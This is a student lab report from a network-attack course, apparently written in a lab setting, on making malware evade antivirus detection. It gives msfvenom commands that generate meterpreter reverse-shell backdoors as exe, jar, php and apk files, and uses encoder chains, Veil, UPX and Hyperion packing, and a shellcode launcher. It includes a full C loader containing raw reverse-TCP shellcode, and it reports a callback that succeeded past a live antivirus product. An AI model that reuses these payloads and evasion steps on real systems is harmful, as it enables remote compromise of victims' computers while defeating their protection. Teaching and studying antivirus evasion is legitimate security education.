2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践
2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践
1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
正确使用msf编码器
-
使用
msfvenom -l encoders查看可以使用的编码器来生成不同的后门,更多的参数可以参考msfvenom一些基本用法
-
对实验二生成的20175216_backdoor.exe后门程序用VirusTotal进行扫描,结果如下图所示:
-
对实验二生成的
20175216_backdoor.exe后门程序,用virscan进行扫描,扫了两次结果不一样,一次为危险,另一次为提醒(总感觉这杀软网站差点意思)扫描结果如下图所示:
- 使用msf编码器对后门程序进行一次到多次的编码,并进行检测。
- 一次编码:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.170.142 LPORT=5216 -f exe > zxy-encoded.exe(LHOST=Attacker's IP ,使用-p来指定要使用的payload,使用-b选项设定了规避字符集,会自动调用编码器,使用-f来指定payload的输出格式)
-
对生成的
zxy-encoded.exe后门程序,使用VirusTotal进行扫描,扫描结果如下图所示:
-
十次编码:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.170.142 LPORT=5216 -f exe > zxy-encoded10.exe进行10次编码降低被查杀概率
- 对生成的
zxy-encoded10.exe后门程序,使用VirusTotal进行扫描,扫描结果如下图所示:
msfvenom生成jar文件
-
msf生成jar文件
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.170.142 LPORT=5216 x> zxy_backdoor_java.jar
-
- 对生成的
zxy_backdoor_java.jar后门文件,使用VirusTotal进行扫描,扫描结果如下图所示
- 对生成的
msfvenom生成php文件
- msf生成php文件
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.170.142 lport=5216 x> zxy_backdoor.php
- 对生成的
zxy_backdoor.php后门文件,使用VirusTotal进行扫描,扫描结果如下图所示
msfvenom生成apk文件
- msf生成apk文件
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.170.142 lport=5216 x> zxy_backdoor.apk
- 对生成的
zxy_backdoor.apk后门文件,使用VirusTotal进行扫描,扫描结果如下图所示
veil
- 1、安装过程
- 更换镜像源,更换阿里云镜像源和中科大镜像源都可以,我选择的阿里云的镜像源具体,可以参考kali linux 更换镜像源
- 安装以下软件
sudo apt-get install libncurses5*
sudo apt-get install libavutil55*
sudo apt-get install gcc-mingw-w64*
sudo apt-get install wine32
sudo apt-get update
- 安装veil
sudo apt-get install veil-evasion
-
选择输入s,安装时默认选择提示选项
-
2、使用veil生成后门文件
-
安装成功,
veil指令进入界面
-
可以输入指令
use 1使用veil-evasion
-
输入指令
list
-
输入命令
use 22进入配置界面
-
设置端口号和IP地址
set LHOST 192.168.170.142//设置反弹连接IP
set LPORT 5216//设置端口
-
输入
generate生成文件,接着输入你想要payload的名字:veil_ps_5216,文件保存路径为:/var/lib/veil/output/source/veil_ps_5216.bat
-
对生成的
veil_ps_5216.bat后门文件,使用VirusTotal进行扫描,扫描结果如下图所示,和原来也差不多
-
生成一个
veil_py_5216.py文件(和上述步骤一样),使用VirusTotal进行扫描,扫描结果如下图所示,检出率比上面检测的所有文件都要低,看来不同的文件类型,检出率也不一样
使用C + shellcode编程
-
使用命令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.170.142 LPORT=5216 -f c生成shellcode
-
新建
20175216.c
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\xaa\x8e"
"\x68\x02\x00\x14\x60\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"
"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"
"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
"\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"
"\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
int main()
{
int (*func)() = (int(*)())buf;
func();
}
- 使用mingw-w32将c语言文件生成exe文件
i686-w64-mingw32-g++ 20175216.c -o 20175216.exe
-
对创建的
20175216.exe后门文件,使用VirusTotal进行扫描,扫描结果如下图所示
-
然后把文件放到win10运行下试试,反正觉得肯定不行,这要行的话,我都害怕
加壳工具
- 给之前的生成的文件进行加壳操作,压缩壳upx进行加壳,指令为
upx 20175216.exe -o 20175216_upx.exe
- 对创建的
20175216_upx.exe后门文件,使用VirusTotal进行扫描,扫描结果如下图所示
- 加密壳(Hyperion)进行加壳,将加壳的文件复制到/usr/share/windows-resources/hyperion/中,输入命令
wine hyperion.exe -v 20175216_upx.exe 20175216_hyperion_upx.exe
对创建的20175216_hyperion_upx.exe后门文件,使用VirusTotal进行扫描,扫描结果如下图所示,加壳之后检出率更高了
使用其他课堂未介绍方法
- 强制类型转换+shellcode
- 输入
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.170.142 LPORT=5216 -f c获取shellcode
- 新建
zxy5216.c
- 使用mingw-w32将c语言文件生成exe文件
i686-w64-mingw32-g++ zxy5216.c -o zxy5216.exe
- 对创建的
zxy5216.exe后门文件,使用VirusTotal进行扫描,扫描结果如下图所示
2.通过组合应用各种技术实现恶意代码免杀
- 使用工具shellcode_launcher
- 先用Msfvenom生成raw格式的shellcode
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.170.142 lport=5216 -f raw -o zxy5216.raw
- msfconsole开始监听
- 在
shellcode_launcher-master文件打开cmd,运行指令shellcode_launcher.exe -i zxy5216.raw
对创建的zxy5216.raw后门文件,使用VirusTotal进行扫描,扫描结果如下图所示
真的没想到这个检出率真么低,用杀毒软件扫也没发生风险
3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
电脑系统windows7 6.1.7601
杀软名称:腾讯电脑管家 13.5.20525.234
实验总结
1.实验中遇到的问题
- 无法定位软件包
- 更换镜像源,kali自带镜像源很多都不支持,建议更换阿里云。可以参考kali linux 更换镜像源
2.基础问题回答
(1)杀软是如何检测出恶意代码的?
1、一个可执行文件中如果包含特征码,即可执行文件中有一段或多段可疑数据如shellcode之类的,杀软就认为这是恶意代码。
2、一个程序如果有特征码且有未经授权的非法动作时,杀软检测为恶意代码。
(2)免杀是做什么?
免杀能够让恶意代码躲过杀软的检测对攻击机进行非法操作,达到自己攻击目的。
(3)免杀的基本方法有哪些?
1、改变特征码,如加壳、c语言调用shellcode
2、改变行为,尽量使用反弹式连接、减少对系统的修改
3.实践总结与体会
通过这次免杀实验,我看到了杀毒软件也有局限性,有些程序有风险,杀毒软件可能只是提示有风险,让你自己来决定要不要用这个程序,这个时候最好还是慎重一些,十有八九是木马,但有的时候也不是。
做实验的时候用了很多的方法,像加壳、veil等方法,都没实现免杀,但有些放在电脑里只要不运行,杀软也没杀出来,但只要运行,要么提示有风险,要么直接就给杀掉了,人家那些杀毒软件设计者肯定也都学过这些,所以,实现免杀还是要费一番大功夫的。
4.开启杀软能绝对防止电脑中恶意代码吗?
开启杀软不能绝对防止电脑中恶意代码,但相对可以降低电脑中恶意代码的概率,目前杀毒软件已经很完善了,毕竟都是大公司设计的软件,经过了无数次的升级,对电脑的保护已经特别到位。
